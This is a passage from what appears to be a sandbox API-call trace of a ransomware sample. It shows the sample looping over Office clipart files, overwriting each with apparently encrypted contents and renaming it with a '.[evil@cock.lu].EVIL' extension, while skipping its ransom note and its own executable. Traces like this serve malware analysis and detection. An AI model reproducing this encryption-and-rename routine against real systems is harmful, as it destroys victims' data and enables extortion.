[0169.877] CloseHandle (hObject=0x1a8) returned 1 [0169.877] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.877] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.877] __uncaught_exception () returned 0x84b1160800 [0169.877] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.877] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00911_.wmf.[evil@cock.lu].evil")) returned 1 [0169.878] ??_V@YAXPEAX@Z () returned 0x1 [0169.881] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00911_.WMF", dwFileAttributes=0x200) returned 0 [0169.881] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.881] wcsstr (_Str="SO00913_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.881] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF") returned 69 [0169.881] wcscmp (_String1="SO00913_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.881] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00913_.WMF") returned 0x0 [0169.881] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF") returned 0x45 [0169.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.883] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x28b4, lpOverlapped=0x0) returned 1 [0169.892] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.892] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.892] _errno () returned 0x84b1160840 [0169.892] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.892] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x28c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x28c0, lpOverlapped=0x0) returned 1 [0169.892] CloseHandle (hObject=0x1a8) returned 1 [0169.892] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.892] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.893] __uncaught_exception () returned 0x84b1160800 [0169.893] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.893] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00913_.wmf.[evil@cock.lu].evil")) returned 1 [0169.894] ??_V@YAXPEAX@Z () returned 0x1 [0169.896] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00913_.WMF", dwFileAttributes=0x200) returned 0 [0169.896] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.896] wcsstr (_Str="SO00914_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.896] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF") returned 69 [0169.897] wcscmp (_String1="SO00914_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.897] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00914_.WMF") returned 0x0 [0169.897] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF") returned 0x45 [0169.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.899] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b0c, lpOverlapped=0x0) returned 1 [0169.906] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.906] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.906] _errno () returned 0x84b1160840 [0169.906] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.906] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b20, lpOverlapped=0x0) returned 1 [0169.906] CloseHandle (hObject=0x1a8) returned 1 [0169.906] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.906] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.906] __uncaught_exception () returned 0x84b1160800 [0169.906] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.906] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00914_.wmf.[evil@cock.lu].evil")) returned 1 [0169.909] ??_V@YAXPEAX@Z () returned 0x1 [0169.912] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00914_.WMF", dwFileAttributes=0x200) returned 0 [0169.912] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.912] wcsstr (_Str="SO00915_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.912] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF") returned 69 [0169.912] wcscmp (_String1="SO00915_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.912] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00915_.WMF") returned 0x0 [0169.912] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF") returned 0x45 [0169.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.915] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bf8, lpOverlapped=0x0) returned 1 [0169.922] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.922] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.922] _errno () returned 0x84b1160840 [0169.922] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.922] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c00, lpOverlapped=0x0) returned 1 [0169.922] CloseHandle (hObject=0x1a8) returned 1 [0169.922] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.922] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.922] __uncaught_exception () returned 0x84b1160800 [0169.922] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.922] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00915_.wmf.[evil@cock.lu].evil")) returned 1 [0169.923] ??_V@YAXPEAX@Z () returned 0x1 [0169.926] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00915_.WMF", dwFileAttributes=0x200) returned 0 [0169.926] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.926] wcsstr (_Str="SO00916_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.926] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF") returned 69 [0169.926] wcscmp (_String1="SO00916_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.926] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00916_.WMF") returned 0x0 [0169.926] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF") returned 0x45 [0169.926] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.928] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1270, lpOverlapped=0x0) returned 1 [0169.935] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.935] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.935] _errno () returned 0x84b1160840 [0169.935] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.935] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1280, lpOverlapped=0x0) returned 1 [0169.935] CloseHandle (hObject=0x1a8) returned 1 [0169.935] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.936] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.936] __uncaught_exception () returned 0x84b1160800 [0169.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00916_.wmf.[evil@cock.lu].evil")) returned 1 [0169.937] ??_V@YAXPEAX@Z () returned 0x1 [0169.940] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00916_.WMF", dwFileAttributes=0x200) returned 0 [0169.940] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.940] wcsstr (_Str="SO00917_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.940] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF") returned 69 [0169.940] wcscmp (_String1="SO00917_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00917_.WMF") returned 0x0 [0169.940] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF") returned 0x45 [0169.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.943] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x25ac, lpOverlapped=0x0) returned 1 [0169.950] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.950] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.950] _errno () returned 0x84b1160840 [0169.950] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.950] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x25c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x25c0, lpOverlapped=0x0) returned 1 [0169.950] CloseHandle (hObject=0x1a8) returned 1 [0169.950] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.951] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.951] __uncaught_exception () returned 0x84b1160800 [0169.951] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.951] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00917_.wmf.[evil@cock.lu].evil")) returned 1 [0169.952] ??_V@YAXPEAX@Z () returned 0x1 [0169.955] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00917_.WMF", dwFileAttributes=0x200) returned 0 [0169.955] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.955] wcsstr (_Str="SO00918_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.955] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF") returned 69 [0169.955] wcscmp (_String1="SO00918_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.955] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00918_.WMF") returned 0x0 [0169.955] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF") returned 0x45 [0169.955] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.957] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1f5c, lpOverlapped=0x0) returned 1 [0169.967] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.967] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.967] _errno () returned 0x84b1160840 [0169.967] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.967] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f60, lpOverlapped=0x0) returned 1 [0169.967] CloseHandle (hObject=0x1a8) returned 1 [0169.967] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.967] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.968] __uncaught_exception () returned 0x84b1160800 [0169.968] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.968] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00918_.wmf.[evil@cock.lu].evil")) returned 1 [0169.969] ??_V@YAXPEAX@Z () returned 0x1 [0169.971] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00918_.WMF", dwFileAttributes=0x200) returned 0 [0169.972] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.972] wcsstr (_Str="SO00935_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.972] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF") returned 69 [0169.972] wcscmp (_String1="SO00935_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.972] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00935_.WMF") returned 0x0 [0169.972] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF") returned 0x45 [0169.972] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.974] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2944, lpOverlapped=0x0) returned 1 [0169.980] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.980] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0169.980] _errno () returned 0x84b1160840 [0169.980] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.980] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2960, lpOverlapped=0x0) returned 1 [0169.981] CloseHandle (hObject=0x1a8) returned 1 [0169.981] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0169.981] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0169.981] __uncaught_exception () returned 0x84b1160800 [0169.981] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0169.981] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00935_.wmf.[evil@cock.lu].evil")) returned 1 [0169.982] ??_V@YAXPEAX@Z () returned 0x1 [0169.985] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00935_.WMF", dwFileAttributes=0x200) returned 0 [0169.985] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0169.985] wcsstr (_Str="SO00938_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0169.985] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF") returned 69 [0169.985] wcscmp (_String1="SO00938_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0169.985] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00938_.WMF") returned 0x0 [0169.985] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF") returned 0x45 [0169.985] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00938_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0169.988] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1960, lpOverlapped=0x0) returned 1 [0170.004] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.004] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0170.004] _errno () returned 0x84b1160840 [0170.004] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.004] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1980, lpOverlapped=0x0) returned 1 [0170.004] CloseHandle (hObject=0x1a8) returned 1 [0170.005] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00938_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0170.006] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0170.006] __uncaught_exception () returned 0x84b1160800 [0170.006] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 